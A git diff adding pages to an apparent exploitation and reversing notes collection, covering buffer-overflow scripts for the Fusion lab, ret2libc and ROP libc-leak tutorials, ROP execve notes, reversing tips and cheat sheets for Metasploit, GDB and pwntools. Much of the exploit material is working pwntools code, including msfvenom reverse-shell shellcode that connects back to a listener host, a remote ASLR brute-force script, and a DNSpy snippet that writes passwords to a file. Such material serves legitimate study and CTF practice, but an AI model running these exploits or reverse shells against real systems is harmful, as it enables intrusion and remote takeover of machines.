+buf += "\x65\xd9\x0f\x01"
+
+r.recvline()
+r.send(buf)
+r.interactive()
+```
+
+## Level01
+
+```python
+from pwn import *
+
+r = remote("192.168.85.181", 20001)
+
+buf = "GET "            # Needed
+buf += "A"*139          # Offset 139
+buf += p32(0x08049f4f)  # Adress of: JMP esp
+buf += p32(0x9090E6FF)  # OPCODE: JMP esi (the esi register have the address of the shellcode)
+buf += " HTTP/1.1"      # Needed
+buf += "\x90"*100       # NOPs
+
+#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.85.178 LPORT=4444 -a x86 --platform linux -b '\x00\x2f' -f python
+buf += "\xdb\xda\xb8\x3b\x50\xff\x66\xd9\x74\x24\xf4\x5a\x2b"
+buf += "\xc9\xb1\x12\x31\x42\x17\x83\xea\xfc\x03\x79\x43\x1d"
+buf += "\x93\x4c\xb8\x16\xbf\xfd\x7d\x8a\x2a\x03\x0b\xcd\x1b"
+buf += "\x65\xc6\x8e\xcf\x30\x68\xb1\x22\x42\xc1\xb7\x45\x2a"
+buf += "\x12\xef\xe3\x18\xfa\xf2\x0b\x4d\xa7\x7b\xea\xdd\x31"
+buf += "\x2c\xbc\x4e\x0d\xcf\xb7\x91\xbc\x50\x95\x39\x51\x7e"
+buf += "\x69\xd1\xc5\xaf\xa2\x43\x7f\x39\x5f\xd1\x2c\xb0\x41"
+buf += "\x65\xd9\x0f\x01"
+
+r.send(buf)
+r.interactive()
+```
+
diff --git a/exploiting/linux-exploiting-basic-esp/ret2lib.md b/exploiting/linux-exploiting-basic-esp/ret2lib.md
new file mode 100644
index 00000000..6b3f1b5b
--- /dev/null
+++ b/exploiting/linux-exploiting-basic-esp/ret2lib.md
@@ -0,0 +1,76 @@
+# Ret2Lib
+
+**If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.**
+
+## If you are **inside** the **host** 
+
+### You can find the **address of lib**c
+
+```bash
+ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)
+```
+
+If you want to check if the ASLR is changing the address of libc you can do:
+
+```bash
+for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done
+```
+
+### Get offset of system function
+
+```bash
+readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
+```
+
+### Get offset of "/bin/sh"
+
+```bash
+strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
+```
+
+### /proc/&lt;PID&gt;/maps
+
+If the process is creating **children** every time you talk with it \(network server\) try to **read** that file \(probably you will need to be root\).
+
+Here you can find **exactly where is the libc loaded** inside the process and **where is going to be loaded** for every children of the process.
+
+![](../../.gitbook/assets/image%20%2899%29.png)
+
+In this case it is loaded in **0xb75dc000** \(This will be the base address of libc\)
+
+### Using dgp-peda
+
+Get address of **system** function, of **exit** function and of the string **"/bin/sh"** using gdb-peda:
+
+```text
+p system
+p exit
+find "/bin/sh"
+```
+
+## Bypassing ASLR
+
+You can try to bruteforce the abse address of libc.
+
+```python
+for off in range(0xb7000000, 0xb8000000, 0x1000):  
+```
+
+## Code
+
+```text
+from pwn import *
+
+c = remote('192.168.85.181',20002)
+c.recvline()    #Banner
+
+for off in range(0xb7000000, 0xb8000000, 0x1000):
+    p = ""
+    p += p32(off + 0x0003cb20) #system
+    p += "CCCC" #GARBAGE
+    p += p32(off + 0x001388da) #/bin/sh
+    payload = 'A'*0x20010 + p
+    c.send(payload)
+    c.interactive() #?
+```
+
diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md
new file mode 100644
index 00000000..2299f1e7
--- /dev/null
+++ b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md
@@ -0,0 +1,289 @@
+# ROP - Leaking LIBC address
+
+## Quick Resume
+
+1. Find overflow offset
+2. Find POP\_RDI, PUTS\_PLT and MAIN\_PLT gadgets
+3. Find memory address of puts and guess the libc version \(donwload it\)
+4. Given the library just exploit it
+
+## Other tutorials and binaries to practice
+
+This tutorial is going to exploit the code/binary proposed in this tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)  
+Another useful tutorial: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/)
+
+## Code
+
+Filename: `vuln.c`
+
+```c
+#include <stdio.h>
+
+int main() {
+    char buffer[32];
+    puts("Simple ROP.\n");
+    gets(buffer);
+
+    return 0;
+}
+```
+
+```bash
+gcc -o vuln vuln.c -fno-stack-protector  -no-pie
+```
+
+## ROP - PWNtools template
+
+\*\*\*\*[**Find my ROP-PWNtools template here.**](../../misc/basic-python/rop-pwn-template.md) I'm going to use the code located there to make the exploit.  
+Download the exploit and place it in the same directory as the vulnerable binary.
+
+## 1- Finding the offset
+
+The template need an offset before continuing with the exploit. If any is provided it will execute the necessary code to find it \(by default `OFFSET = ""`\):
+
+```bash
+####################
+#### Find offset ###
+####################
+OFFSET = ""#"A"*72
+if OFFSET == "":
+    gdb.attach(p.pid, "c") #Attach and continue
+    payload = cyclic(1000)
+    print(r.clean())
+    r.sendline(payload)
+    #x/wx $rsp -- Search for bytes that crashed the application
+    #cyclic_find(0x6161616b) # Find the offset of those bytes
+    return
+```
+
+**Execute** `python template.py` a GDB console will be opened with the program being crashed. Inside that **GDB console** execute `x/wx $rsp` to get the **bytes** that were going to overwrite the RIP. Finally get the **offset** using a **python** console:
+
+```python
+from pwn import *
+cyclic_find(0x6161616b)
+```
+
+![](../../.gitbook/assets/image%20%28188%29.png)
+
+After finding the offset \(in this case 40\) change the OFFSET variable inside the template using that value.  
+`OFFSET = "A" * 40`
+
+## 2- Finding Gadgets
+
+Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**.
+
+```python
+PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
+MAIN_PLT = elf.symbols['main']
+POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
+RET = (rop.find_gadget(['ret']))[0]
+
+log.info("Main start: " + hex(MAIN_PLT))
+log.info("Puts plt: " + hex(PUTS_PLT))
+log.info("pop rdi; ret  gadget: " + hex(POP_RDI))
+```
+
+The `PUTS_PLT` is needed to call the **function puts**.  
+The `MAIN_PLT` is needed to call the **main function** again after one interaction to **exploit** the overflow **again** \(infinite rounds of exploitation\).It is used at the end of each ROP.  
+The **POP\_RDI** is needed to **pass** a **parameter** to the called function.
+
+In this step you don't need to execute anything as everything will be found by pwntools during the execution.
+
+## 3- Finding LIBC library
+
+Now is time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts`and then we are going to **search** in which **library version** the puts version is in that address.
+
+```python
+def get_addr(func_name):
+    FUNC_GOT = elf.got[func_name]
+    log.info(func_name + " GOT @ " + hex(FUNC_GOT))
+    # Create rop chain
+    rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
+
+    #Send our rop-chain payload
+    #p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
+    print(p.clean()) # clean socket buffer (read all and print)
+    p.sendline(rop1)
+
+    #Parse leaked address
+    recieved = p.recvline().strip()
+    leak = u64(recieved.ljust(8, "\x00"))
+    log.info("Leaked libc address,  "+func_name+": "+ hex(leak))
+    #If not libc yet, stop here
+    if libc != "":
+        libc.address = leak - libc.symbols[func_name] #Save libc base
+        log.info("libc base @ %s" % hex(libc.address))
+    
+    return hex(leak)
+
+get_addr("puts") #Search for puts address in memmory to obtains libc base
+if libc == "":
+    print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
+    p.interactive()
+```
+
+To do so, the most important line of the executed code is:
+
+```python
+rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
+```
+
+This will send some bytes util **overwriting** the **RIP** is possible: `OFFSET`.  
+Then, it will set the **address** of the gadget `POP_RDI` so the next address \(`FUNC_GOT`\) will be saved in the **RDI** registry. This is because we want to **call puts** **passing** it the **address** of the `PUTS_GOT`as the address in memory of puts function is saved in the address pointing by `PUTS_GOT`.  
+After that, `PUTS_PLT` will be called \(with `PUTS_GOT` inside the **RDI**\) so puts will **read the content** inside `PUTS_GOT` \(**the address of puts function in memory**\) and will **print it out**.  
+Finally, **main function is called again** so we can exploit the overflow again.
+
+This way we have **tricked puts function** to **print** out the **address** in **memory** of the function **puts** \(which is inside **libc** library\). Now that we have that address we can **search which libc version is being used**.
+
+![](../../.gitbook/assets/image%20%2881%29.png)
+
+As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used \(just find the library in `/lib/x86_64-linux-gnu/libc.so.6`\).  
+But, in a remote exploit case I will explain here how can you find it:
+
+### 3.1- Searching for libc version \(1\)
+
+You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me/)  
+It will also allow you to download the discovered version of **libc**
+
+![](../../.gitbook/assets/image%20%2816%29.png)
+
+### 3.2- Searching for libc version \(2\)
+
+You can also do:
+
+* `$ git clone https://github.com/niklasb/libc-database.git`
+* `$ cd libc-database`
+* `$ ./get`
+
+This will take some time, be patient.  
+For this to work we need:
+
+* Libc symbol name: `puts`
+* Leaked libc adddress: `0x7ff629878690`
+
+We can figure out which **libc** that is most likely used.
+
+```text
+./find puts 0x7ff629878690
+ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
+archive-glibc (id libc6_2.23-0ubuntu11_amd64)
+```
+
+We get 2 matches \(you should try the second one if the first one is not working\). Download the first one: 
+
+```text
+./download libc6_2.23-0ubuntu10_amd64
+Getting libc6_2.23-0ubuntu10_amd64
+  -> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb
+  -> Downloading package
+  -> Extracting package
+  -> Package saved to libs/libc6_2.23-0ubuntu10_amd64
+```
+
+Copy the libc from `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` to our working directory.
+
+### 3.3- Other functions to leak
+
+```python
+puts
+printf
+__libc_start_main
+read
+gets
+```
+
+## 4- Finding based libc address & exploiting
+
+At this point we should know the libc library used. As we are exploiting a local binary I will use just:`/lib/x86_64-linux-gnu/libc.so.6`
+
+So, at the begging of `template.py` change the **libc** variable to: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it`
+
+Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**. 
+
+Inside the `get_addr`function the **base address of libc** is going to be calculated:
+
+```python
+    if libc != "":
+        libc.address = leak - libc.symbols[func_name] #Save libc base
+        log.info("libc base @ %s" % hex(libc.address))
+```
+
+Then, the address to the function `system` and the **address** to the string _"/bin/sh"_ are going to be **calculated** from the **base address** of **libc** and given the **libc library.**
+
+```python
+BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh
+SYSTEM = libc.sym["system"]
+EXIT = libc.sym["exit"]
+
+log.info("bin/sh %s " % hex(BINSH))
+log.info("system %s " % hex(SYSTEM))
+```
+
+Finally, the /bin/sh execution exploit is going to be prepared sent:
+
+```python
+rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
+
+p.clean()
+p.sendline(rop2)
+
+##### Interact with the shell #####
+p.interactive() #Interact with the conenction
+```
+
+Let's explain this final ROP.  
+The last ROP \(`rop1`\) ended calling again the main function, then we can **exploit again** the **overflow** \(that's why the `OFFSET` is here again\). Then, we want to call `POP_RDI` pointing to the **addres** of _"/bin/sh"_ \(`BINSH`\) and call **system** function \(`SYSTEM`\) because the address of _"/bin/sh"_ will be passed as a parameter.  
+Finally, the **address of exit function** is **called** so the process **exists nicely** and any alert is generated.
+
+**This way the exploit will execute a** _**/bin/sh**_ **shell.**
+
+![](../../.gitbook/assets/image%20%28255%29.png)
+
+## 4\(2\)- Using ONE\_GADGET
+
+You could also use [ONE\_GADGET ](https://github.com/david942j/one_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP**.   
+However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
+
+```python
+ONE_GADGET = libc.address + 0x4526a
+rop2 = base + p64(ONE_GADGET) + "\x00"*100
+```
+
+## EXPLOIT FILE
+
+Here you have the final exploit after having performed all the necessary changes to the original [**template.py**](../../misc/basic-python/rop-pwn-template.md) **file**.
+
+{% file src="../../.gitbook/assets/template.py" caption="template.py" %}
+
+## Common problems
+
+### MAIN\_PLT = elf.symbols\['main'\] not found
+
+If the "main" symbol does not exist. Then you can just where is the main code:
+
+```python
+objdump -d vuln_binary | grep "\.text"
+Disassembly of section .text:
+0000000000401080 <.text>:
+```
+
+and set the address manually:
+
+```python
+MAIN_PLT = 0x401080
+```
+
+## Puts not found
+
+If the binary is not using Puts you should check if it is using
+
+### `sh: 1: %s%s%s%s%s%s%s%s: not found`
+
+If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
+
+Try to **subtract 64 bytes to the address of "/bin/sh"**:
+
+```python
+BINSH = next(libc.search("/bin/sh")) - 64
+```
+
diff --git a/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md b/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md
new file mode 100644
index 00000000..f977b4ca
--- /dev/null
+++ b/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md
@@ -0,0 +1,51 @@
+# ROP - Syscall execv
+
+The objective is to call the **syscall \(execv\)** from a ROP controlling the value of registries: _RDI, RSI, RDX, RAX_ and obviously the _RIP_ \(the other ones doesn't matters\), and controlling somewhere to write _"/bin/sh"_
+
+* **RDI**: Pointing to the string "/bin/bash"
+* **RSI**: Null
+* **RDX**: Null
+* **RAX**: Value **0x3b** for x64 and **0xb** for x32, because this will call **execv**
+
+```text
+ROPgadget --binary vulnbinary | grep syscall
+ROPgadget --binary vulnbinary | grep "rdi\|rsi\|rdx\|rax" | grep pop
+```
+
+## Writing
+
+If you can somehow write to an address and then get the address of where you have written then this step is unnecessary.
+
+Elsewhere, you may search for some **write-what-where**.  
+As is explained in this tutorial: [https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/](https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/) you have to find something that allows you to save some value inside a registry and then save it to some controlled address inside another registry. For example some `pop eax; ret` , `pop edx: ret` , `mov eax, [edx]`
+
+You can find mov gadgets doing: `ROPgadget --binary vulnbinary | grep mov`
+
+### Finding a place to write
+
+If you have found some **write-what-where** and can control the needed registries to call execv, there is only left finding a place to write.
+
+```text
+objdump -x vulnbinary | grep ".bss" -B1
+                  CONTENTS, ALLOC, LOAD, DATA
+ 23 .bss          00000010  00403418  00403418  00002418  2**3
+```
+
+In this case: **0x403418**
+
+### **Writing** _**"/bin/sh"**_
+
+```text
+buffer += address(pop_eax) # place value into EAX
+buffer += "/bin"           # 4 bytes at a time
+buffer += address(pop_edx)         # place value into edx
+buffer += address(writable_memory)
+buffer += address(writewhatwhere)
+
+buffer += address(pop_eax)
+buffer += "//sh"
+buffer += address(pop_edx)
+buffer += address(writable_memory + 4)
+buffer += address(writewhatwhere)
+```
+
diff --git a/exploiting/reversing.md b/exploiting/reversing.md
new file mode 100644
index 00000000..ca1ae2ab
--- /dev/null
+++ b/exploiting/reversing.md
@@ -0,0 +1,161 @@
+# Reversing
+
+## Wasm decompiler
+
+[https://www.pnfsoftware.com/jeb/demowasm](https://www.pnfsoftware.com/jeb/demowasm)
+
+## .Net decompiler
+
+[https://github.com/icsharpcode/ILSpy](https://github.com/icsharpcode/ILSpy)  
+[ILSpy plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): You can have it in any OS \(you can install it directly from VSCode, no need to download the git. Click on **Extensions** and **search ILSpy**\).  
+If you need to **decompile**, **modify** and **recompile** again you can use: [**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases) \(**Right Click -&gt; Modify Method** to change something inside a function\).
+
+### DNSpy Logging
+
+In order to make **DNSpy log some information in a file**, you could use this .Net lines:
+
+```bash
+using System.IO;
+path = "C:\\inetpub\\temp\\MyTest2.txt";
+File.AppendAllText(path, "Password: " + password + "\n");
+```
+
+### DNSpy Debugging
+
+In order to debug code using DNSpy you need to:
+
+First, change the **Assembly attributes** related to **debugging**:
+
+![](../.gitbook/assets/image%20%287%29.png)
+
+From:
+
+```aspnet
+[assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
+```
+
+To:
+
+```text
+[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
+DebuggableAttribute.DebuggingModes.DisableOptimizations |
+DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
+DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
+```
+
+And click on **compile**:
+
+![](../.gitbook/assets/image%20%28144%29.png)
+
+Then save the new file on _**File &gt;&gt; Save module...**_:
+
+![](../.gitbook/assets/image%20%28261%29.png)
+
+This is necessary because if you don't do this, at **runtime** several **optimisations** will be applied to the code and it could be possible that while debugging a **break-point is never hit** or some **variables don't exist**.
+
+Then, if your .Net application is being **run** by **IIS** you can **restart** it with:
+
+```text
+iisreset /noforce
+```
+
+Then, in order to start debugging you should close all the opened files and inside the **Debug Tab** select **Attach to Process...**:
+
+![](../.gitbook/assets/image%20%28166%29.png)
+
+Then select **w3wp.exe** to attach to the **IIS server** and click **attach**:
+
+![](../.gitbook/assets/image%20%28274%29.png)
+
+Now that we are debugging the process, it's time to stop it and load all the modules. First click on _Debug &gt;&gt; Break All_ and then click on _**Debug &gt;&gt; Windows &gt;&gt; Modules**_:
+
+![](../.gitbook/assets/image%20%28210%29.png)
+
+![](../.gitbook/assets/image%20%28341%29.png)
+
+Click any module on **Modules** and selec**t Open All Modules**:
+
+![](../.gitbook/assets/image%20%28216%29.png)
+
+Right click any module in **Assembly Explorer** and click **Sort Assemblies**:
+
+![](../.gitbook/assets/image%20%28130%29.png)
+
+## Java decompiler
+
+[https://github.com/skylot/jadx](https://github.com/skylot/jadx)  
+[https://github.com/java-decompiler/jd-gui/releases](https://github.com/java-decompiler/jd-gui/releases)
+
+## Debugging DLLs
+
+### Using IDA
+
+* **Load rundll32** \(64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe\)
+* Select **Windbg** debugger
+* Select "**Suspend on library load/unload**"
+
+![](../.gitbook/assets/image%20%2869%29.png)
+
+* Configure the **parameters** of the execution putting the **path to the DLL** and the function that you want to call:
+
+![](../.gitbook/assets/image%20%28325%29.png)
+
+Then, when you start debugging **the execution will be stopped when each DLL is loaded**, then, when rundll32 load your DLL the execution will be stopped.
+
+But, how can you get to the code of the DLL that was lodaded? Using this method, I don't know how.
+
+### Using x64dbg/x32dbg
+
+* **Load rundll32** \(64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe\)
+* **Change the Command Line** \( _File --&gt; Change Command Line_ \) and set the path of the dll and the function that you want to call, for example: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\14.ridii\_2.dll",DLLMain
+* Change _Options --&gt; Settings_ and select "**DLL Entry**".
+* Then **start the execution**, the debugger will stop at each dll main, at some point you will **stop in the dll Entry of your dll**. From there, just search for the points where you want to put a breakpoint.
+
+Notice that when the execution is stopped by any reason in win64dbg you can see **in which code you are** looking in the **top of the win64dbg window**:
+
+![](../.gitbook/assets/image%20%28181%29.png)
+
+Then, looking to this ca see when the execution was stopped in the dll you want to debug.
+
+## ARM & MIPS
+
+{% embed url="https://github.com/nongiach/arm\_now" %}
+
+## Shellcodes
+
+You should try ****[**scdbg**](http://sandsprite.com/blogs/index.php?uid=7&pid=152).  
+It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory.
+
+```bash
+scdbg.exe -f shellcode # Get info
+scdbg.exe -f shellcode -r #Run it
+scdbg.exe -f shellcode -r #Run it with hooks
+scdbg.exe -f shellcode -d #Dump decoded shellcode
+scdbg.exe -f shellcode /findsc #Find offset where starts
+```
+
+To **run a shellcode** you can also use: [http://mcdermottcybersecurity.com/articles/windows-x64-shellcode\#testing](http://mcdermottcybersecurity.com/articles/windows-x64-shellcode#testing)
+
+## [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator)
+
+This ofuscator change all the instructions for `mov`\(yeah, really cool\). It also uses interruptions to change executions flows. For more information about how does it works:
+
+* [https://www.youtube.com/watch?v=2VF\_wPkiBJY](https://www.youtube.com/watch?v=2VF_wPkiBJY)
+* [https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas\_2015\_the\_movfuscator.pdf](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf)
+
+If you are lucky [demovfuscator ](https://github.com/kirschju/demovfuscator)will deofuscate the binary. It has several dependencies
+
+```text
+apt-get install libcapstone-dev
+apt-get install libz3-dev
+```
+
+And [install keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md) \(`apt-get install cmake; mkdir build; cd build; ../make-share.sh; make install`\)
+
+If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html) 
+
+## Courses
+
+* [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse_ReverseEngineering)
+* [https://github.com/malrev/ABD](https://github.com/malrev/ABD) \(Binary deobfuscation\)
+
diff --git a/exploiting/tools/README.md b/exploiting/tools/README.md
new file mode 100644
index 00000000..d29cd749
--- /dev/null
+++ b/exploiting/tools/README.md
@@ -0,0 +1,165 @@
+# Exploiting Tools
+
+## Metasploit
+
+```text
+pattern_create.rb -l 3000   #Length
+pattern_offset.rb -l 3000 -q 5f97d534   #Search offset
+nasm_shell.rb
+nasm> jmp esp   #Get opcodes
+msfelfscan -j esi /opt/fusion/bin/level01
+```
+
+### Shellcodes
+
+```text
+msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
+```
+
+## GDB
+
+### Install:
+
+apt-get install gdb
+
+### Parameters:
+
+**-q** --&gt; No muestra mierda inicial al ejecutar gdb  
+**-x &lt;file&gt;** --&gt; le pasas un archivo con instrucciones de gdb que ejecutará al inicio  
+**-p &lt;pid&gt;** --&gt; Attach to process
+
+#### Instructions
+
+&gt; **disassemble main** --&gt; Dissasemble the function  
+&gt; **disassemble 0x12345678**  
+&gt; **set disassembly-flavor intel**  
+&gt; **set follow-fork-mode child/parent** --&gt; Follow created process  
+&gt; **p system** --&gt; Find the address of the system function  
+&gt; **help**  
+&gt; **quit**
+
+&gt; **br func**  --&gt; Add breakpoint to function  
+&gt; **br \*func+23**  
+&gt; **br \*0x12345678  
+&gt; del NUM** --&gt; Delete that number of br  
+&gt; **watch EXPRESSION** --&gt; Break if the value changes
+
+**&gt; run** --&gt; Execute  
+**&gt; start** --&gt; Start and break in main  
+&gt; **n/next** --&gt; Execute next instruction \(no inside\)  
+&gt; **s/step** --&gt; Execute next instruction  
+&gt; **c/continue** --&gt; Continue until next breakpoint
+
+&gt; **set $eip = 0x12345678** --&gt; Change value of $eip  
+&gt; **info functions** --&gt; Info abount functions  
+&gt; **info functions func** --&gt; Info of the funtion  
+&gt; **info registers** --&gt; Value of the registers  
+&gt; **bt** --&gt; Stack  
+&gt; **bt full** --&gt; Detailed stack
+
+&gt; **print variable**  
+&gt; **print 0x87654321 - 0x12345678** --&gt; Caculate  
+&gt; **examine o/x/u/t/i/s dir\_mem/reg/puntero** --&gt; Shows content in octal/hexa/10/bin/instruction/ascii
+
+* **x/o 0xDir\_hex**
+* **x/2x $eip** --&gt; 2Words from EIP
+* **x/2x $eip -4** --&gt;  $eip - 4
+* **x/8xb $eip** --&gt; 8  bytes \(b-&gt; byte, h-&gt; 2bytes, w-&gt; 4bytes, g-&gt; 8bytes\)
+* **i r eip** --&gt; Value of $eip
+* **x/w pointer** --&gt; Value of the pointer
+* **x/s pointer** --&gt; String pointed by the pointer
+* **x/xw &pointer** --&gt; Address where the poiniter is located
+* **x/i $eip** —&gt; Instructions of the EIP
+
+### Peda
+
+**shellcode generate** x86/linux bindport 5555 127.0.0.1  
+**shellcode generate** x86/linux connect 5555 127.0.0.1  
+**checksec** --&gt; Check protections  
+**searchmem /bin/sh** --&gt; Find that string \(/bin/sh\) inside the memory
+
+### GDB server
+
+gdbserver --multi 0.0.0.0:23947 \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\)
+
+## GCC
+
+**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --&gt; Compile without protections  
+**-o** --&gt; Output  
+**-g** --&gt; Save code \(GDB will be able to see it\)  
+**echo 0 &gt; /proc/sys/kernel/randomize\_va\_space** --&gt; To deactivate the ASLR in linux
+
+**To compile a shellcode:  
+nasm -f elf assembly.asm** --&gt; return a ".o"  
+**ld assembly.o -o shellcodeout** --&gt; Executable
+
+## Objdump
+
+**-d** --&gt; Disassemble executable sections \(see opcodes of a compiled shellcode, find ROP Gadgets, find function address...\)  
+**-Mintel** --&gt; Intel sintax  
+**-t** --&gt; Symbols table \(grep varBSS to get the address\)  
+**-D** --&gt; Disassemble all \(address of static variable\)  
+**-s -j .dtors** --&gt; Contenido de dtors  
+**-s -j .got** --&gt; Contenido de got  
+**-TR** --&gt; Relocations  
+**ojdump -t --dynamic-relo ./exec \| grep puts** --&gt; Address of "puts" to modify in GOT  
+**objdump -TR ./exec \| grep exit\(func lib\)** —&gt; Get address of all the functions inside the GOT
+
+## Core dumps
+
+1. Run `ulimit -c unlimited` before starting my program
+2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t`
+3. sudo gdb --core=&lt;path/core&gt; --quiet
+
+## More
+
+**ldd executable \| grep libc.so.6** --&gt; Address \(if ASLR, then this change every time\)  
+**for i in \`seq 0 20\`; do ldd &lt;Ejecutable&gt; \| grep libc; done** --&gt; Loop to see if the address changes a lot  
+**readelf -s /lib/i386-linux-gnu/libc.so.6 \| grep system** --&gt; Offset of "system"  
+**strings -a -t x /lib/i386-linux-gnu/libc.so.6 \| grep /bin/sh** --&gt; Offset of "/bin/sh"
+
+**strace executable** --&gt; Functions called by the executable  
+**rabin2 -i ejecutable --&gt;** Address of all the functions
+
+**/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb --length 1000  
+/usr/share/metasploit-framework/tools/exploit/pattern\_offset.rb --length 1000 --query 1Ad2**
+
+## **Inmunity debugger**
+
+```text
+!mona modules    #Get protections, look for all false except last one (Dll of SO)
+!mona find -s "\xff\xe4" -m name_unsecure.dll   #Search for opcodes insie dll space (JMP ESP)
+```
+
+## IDA
+
+### Debugging in remote linux
+
+Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux\_server_ or _linux\_server64_ inside the linux server and run it nside the folder that contains the binary:
+
+```text
+./linux_server64 -Ppass
+```
+
+ Then, configure the debugger: Debugger \(linux remote\) --&gt; Proccess options...:
+
+![](../../.gitbook/assets/image%20%28112%29.png)
+
+### **Delphi binaries**
+
+I you have to reverse a Delphi binary I would suggest you tu use the IDA plugin [https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi)\*\*\*\*
+
+Just press **ATL+f7** \(import python plugin in IDA\) and select the python plugin.
+
+This plugin will execute the binary and resolve functoin names dynamically att the start of the debugging. After starting the debugging press again the Start button \(the green one or f9\) and a breakpoint will hit in the begining of the real code.
+
+It is also very interesting because if you press a boton in the graphic application the debugger will stop in the function executed by that bottom.
+
+### Golang binaries
+
+I you have to reverse a Golang binary I would suggest you tu use the IDA plugin [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper)
+
+Just press **ATL+f7** \(import python plugin in IDA\) and select the python plugin.
+
+This will resolve the names of the functions.
+
diff --git a/exploiting/tools/pwntools.md b/exploiting/tools/pwntools.md
new file mode 100644
index 00000000..1fc99b4e
--- /dev/null
+++ b/exploiting/tools/pwntools.md
@@ -0,0 +1,173 @@
+# PwnTools
+
+```text
+pip3 install pwntools
+```
+
+## Pwn asm 
+
+Get opcodes from line or file. 
+
+```text
+pwn asm "jmp esp" 
+pwn asm -i <filepath>
+```
+
+**Can select:** 
+
+* output type \(raw,hex,string,elf\)
+* output file context \(16,32,64,linux,windows...\)
+* avoid bytes \(new lines, null, a list\) 
+* select encoder debug shellcode using gdb run the output
+
+##   **Pwn checksec**
+
+Checksec script 
+
+```text
+pwn checksec <executable>
+```
+
+## Pwn constgrep
+
+## Pwn cyclic 
+
+Get a pattern
+
+```text
+pwn cyclic 3000
+pwn cyclic -l faad
+```
+
+**Can select:**    
+
+* The used alphabet \(lowercase chars by default\)
+* Length of uniq pattern \(default 4\)
+* context \(16,32,64,linux,windows...\)
+* Take the offset \(-l\)
+
+## Pwn debug
+
+Attach GDB to a process
+
+```text
+pwn debug --exec /bin/bash
+pwn debug --pid 1234
+pwn debug --process bash
+```
+
+**Can select:** 
+
+* By executable, by name or by pid context \(16,32,64,linux,windows...\) 
+* gdbscript to execute 
+* sysrootpath
+
+## Pwn disablenx 
+
+Disable nx of a binary  
+
+```text
+pwn disablenx <filepath>
+```
+
+## Pwn disasm 
+
